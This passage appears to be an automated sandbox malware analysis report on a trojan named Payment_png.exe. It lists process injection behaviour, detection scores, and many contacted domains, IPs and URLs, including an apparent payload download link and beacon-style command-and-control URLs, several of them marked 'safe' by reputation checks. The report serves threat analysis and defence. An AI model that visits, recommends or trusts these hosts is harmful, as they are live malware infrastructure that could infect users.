35 www.birkenhof-allgaeu.net 217.160.0.233, 49738, 80 ONEANDONE-ASBrauerstrasse48DE Germany 18->35 37 uforservice.com 23.227.38.32, 49742, 80 CLOUDFLARENETUS Canada 18->37 39 15 other IPs or domains 18->39 53 System process connects to network (likely due to code injection or exploit) 18->53 22 colorcpl.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Payment_png.exe70%VirustotalBrowse
      Payment_png.exe22%MetadefenderBrowse
      Payment_png.exe79%ReversingLabsWin32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      14.2.colorcpl.exe.30327b8.2.unpack100%AviraTR/Dropper.GenDownload File
      14.2.colorcpl.exe.5117960.5.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse
      aps-mm.com2%VirustotalBrowse
      silverdollarcafe.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.uforservice.com0%Avira URL Cloudsafe
      http://www.aainakari.com0%Avira URL Cloudsafe
      http://www.accinf5.com/c8bs/www.silverdollarcafe.com0%Avira URL Cloudsafe
      http://www.silverdollarcafe.comReferer:0%Avira URL Cloudsafe
      http://www.accinf5.com0%Avira URL Cloudsafe
      http://www.domennyarendi39.net/c8bs/www.accinf5.com0%Avira URL Cloudsafe
      http://www.loversdeal.comReferer:0%Avira URL Cloudsafe
      http://www.slutefuter.comReferer:0%Avira URL Cloudsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.pcpartout.comReferer:0%Avira URL Cloudsafe
      http://www.birkenhof-allgaeu.net/c8bs/0%Avira URL Cloudsafe
      http://www.silverdollarcafe.com0%Avira URL Cloudsafe
      http://www.aainakari.com/c8bs/www.bostonm.info0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.plowbrothers.com0%Avira URL Cloudsafe
      http://www.silverdollarcafe.com/c8bs/0%Avira URL Cloudsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.choupisson.comReferer:0%Avira URL Cloudsafe
      http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com0%Avira URL Cloudsafe
      http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net0%Avira URL Cloudsafe
      http://www.birkenhof-allgaeu.net0%Avira URL Cloudsafe
      http://www.booksfall.com0%Avira URL Cloudsafe
      http://www.quantify-co.com/c8bs/0%Avira URL Cloudsafe
      http://www.plowbrothers.comReferer:0%Avira URL Cloudsafe
      http://www.domentemenegi42.net0%Avira URL Cloudsafe
      http://www.pcpartout.com/c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp0%Avira URL Cloudsafe
      http://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp0%Avira URL Cloudsafe
      http://www.bostonm.info/c8bs/0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.aainakari.comReferer:0%Avira URL Cloudsafe
      http://www.plowbrothers.com/c8bs/www.slutefuter.com0%Avira URL Cloudsafe
      http://www.booksfall.com/c8bs/0%Avira URL Cloudsafe
      http://www.domennyarendi39.net0%Avira URL Cloudsafe
      http://aps-mm.com/bin_BNUtTDfY243.bin0%Avira URL Cloudsafe
      http://www.aainakari.com/c8bs/0%Avira URL Cloudsafe
      http://www.loversdeal.com/c8bs/www.booksfall.com0%Avira URL Cloudsafe
      http://www.uforservice.com/c8bs/0%Avira URL Cloudsafe
      http://www.uforservice.com/c8bs/www.domennyarendi39.net0%Avira URL Cloudsafe
      http://www.plowbrothers.com/c8bs/0%Avira URL Cloudsafe
      http://www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.pcpartout.com0%Avira URL Cloudsafe
      http://www.choupisson.com0%Avira URL Cloudsafe
      http://www.domentemenegi42.net/c8bs/0%Avira URL Cloudsafe
      http://www.plowbrothers.com/c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp0%Avira URL Cloudsafe
      http://www.broskiusa.comReferer:0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.accinf5.comReferer:0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.domennyarendi39.net/c8bs/0%Avira URL Cloudsafe
      http://www.domennyarendi39.netReferer:0%Avira URL Cloudsafe
      http://www.choupisson.com/c8bs/0%Avira URL Cloudsafe
      http://www.slutefuter.com0%Avira URL Cloudsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.choupisson.com/c8bs/www.uforservice.com0%Avira URL Cloudsafe
      www.booksfall.com/c8bs/0%Avira URL Cloudsafe
      http://www.bostonm.info/c8bs/www.quantify-co.com0%Avira URL Cloudsafe
      http://www.slutefuter.com/c8bs/0%Avira URL Cloudsafe
      http://www.booksfall.com/c8bs/www.pcpartout.com0%Avira URL Cloudsafe
      http://www.broskiusa.com/c8bs/www.aainakari.com0%Avira URL Cloudsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.aps-mm.com/bin_BNUtTDfY243.bin0%Avira URL Cloudsafe
      http://www.silverdollarcafe.com/c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp0%Avira URL Cloudsafe
      http://www.broskiusa.com/c8bs/0%Avira URL Cloudsafe
      http://www.loversdeal.com/c8bs/0%Avira URL Cloudsafe
      http://www.birkenhof-allgaeu.net/c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp0%Avira URL Cloudsafe
      http://www.uforservice.com/c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      plowbrothers.com
      34.102.136.180
      truefalse
        unknown
        td-balancer-euw2-6-109.wixdns.net
        35.246.6.109
        truefalseunknown
        aps-mm.com
        170.249.199.106
        truefalseunknown
        parkingpage.namecheap.com
        198.54.117.218
        truefalse
          high
          silverdollarcafe.com
          34.102.136.180
          truefalseunknown
          uforservice.com
          23.227.38.32
          truetrue
            unknown
            www.birkenhof-allgaeu.net
            217.160.0.233
            truetrue
              unknown
              www.choupisson.com
              66.96.160.133
              truetrue
                unknown
                www.loversdeal.com
                unknown
                unknowntrue
                  unknown
                  www.uforservice.com
                  unknown
                  unknowntrue
                    unknown
                    www.slutefuter.com
                    unknown
                    unknowntrue
                      unknown
                      www.booksfall.com
                      unknown
                      unknowntrue
                        unknown
                        www.plowbrothers.com
                        unknown
                        unknowntrue
                          unknown
                          www.aps-mm.com
                          unknown
                          unknowntrue
                            unknown
                            www.domennyarendi39.net
                            unknown
                            unknowntrue
                              unknown
                              www.accinf5.com
                              unknown
                              unknowntrue
                                unknown
                                www.pcpartout.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.silverdollarcafe.com
                                  unknown
                                  unknowntrue
                                    unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.pcpartout.com/c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://aps-mm.com/bin_BNUtTDfY243.binfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.plowbrothers.com/c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    www.booksfall.com/c8bs/true
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.aps-mm.com/bin_BNUtTDfY243.binfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.silverdollarcafe.com/c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.birkenhof-allgaeu.net/c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.uforservice.com/c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlptrue
                                    • Avira URL Cloud: safe
                                    unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.uforservice.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.aainakari.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.accinf5.com/c8bs/www.silverdollarcafe.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.silverdollarcafe.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.accinf5.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.domennyarendi39.net/c8bs/www.accinf5.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.loversdeal.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.slutefuter.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.pcpartout.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.birkenhof-allgaeu.net/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.silverdollarcafe.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.aainakari.com/c8bs/www.bostonm.infoexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.plowbrothers.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.silverdollarcafe.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.choupisson.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.netexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.birkenhof-allgaeu.netexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.booksfall.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.quantify-co.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.plowbrothers.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.domentemenegi42.netexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.bostonm.info/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comlexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.aainakari.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.plowbrothers.com/c8bs/www.slutefuter.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.booksfall.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.domennyarendi39.netexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.aainakari.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.loversdeal.com/c8bs/www.booksfall.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.uforservice.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.uforservice.com/c8bs/www.domennyarendi39.netexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designersGexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.plowbrothers.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers/?explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.pcpartout.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.choupisson.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designers?explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.domentemenegi42.net/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.broskiusa.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tiro.comexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.accinf5.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.goodfont.co.krexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.domennyarendi39.net/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.domennyarendi39.netReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.choupisson.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.slutefuter.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.typography.netDexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://fontfabrik.comexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.choupisson.com/c8bs/www.uforservice.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.bostonm.info/c8bs/www.quantify-co.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.slutefuter.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.booksfall.com/c8bs/www.pcpartout.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.broskiusa.com/c8bs/www.aainakari.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fonts.comexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.sandoll.co.krexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sakkal.comexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.broskiusa.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.loversdeal.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.loversdeal.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.domentemenegi42.netReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.bostonm.infoReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.slutefuter.com/c8bs/www.loversdeal.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.quantify-co.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.booksfall.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cnexplorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.accinf5.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.pcpartout.com/c8bs/explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.uforservice.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.broskiusa.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.pcpartout.com/c8bs/www.birkenhof-allgaeu.netexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.quantify-co.com/c8bs/Mexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.birkenhof-allgaeu.netReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers8explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.domentemenegi42.net/c8bs/www.broskiusa.comexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.bostonm.infoexplorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.quantify-co.comReferer:explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        198.54.117.218
                                                        parkingpage.namecheap.comUnited States
                                                        22612NAMECHEAP-NETUSfalse
                                                        217.160.0.233
                                                        www.birkenhof-allgaeu.netGermany
                                                        8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                        35.246.6.109
                                                        td-balancer-euw2-6-109.wixdns.netUnited States
                                                        15169GOOGLEUSfalse
                                                        170.249.199.106
                                                        aps-mm.comUnited States
                                                        63410PRIVATESYSTEMSUSfalse
                                                        34.102.136.180
                                                        plowbrothers.comUnited States
                                                        15169GOOGLEUSfalse
                                                        66.96.160.133
                                                        www.choupisson.comUnited States
                                                        29873BIZLAND-SDUStrue
                                                        23.227.38.32
                                                        uforservice.comCanada
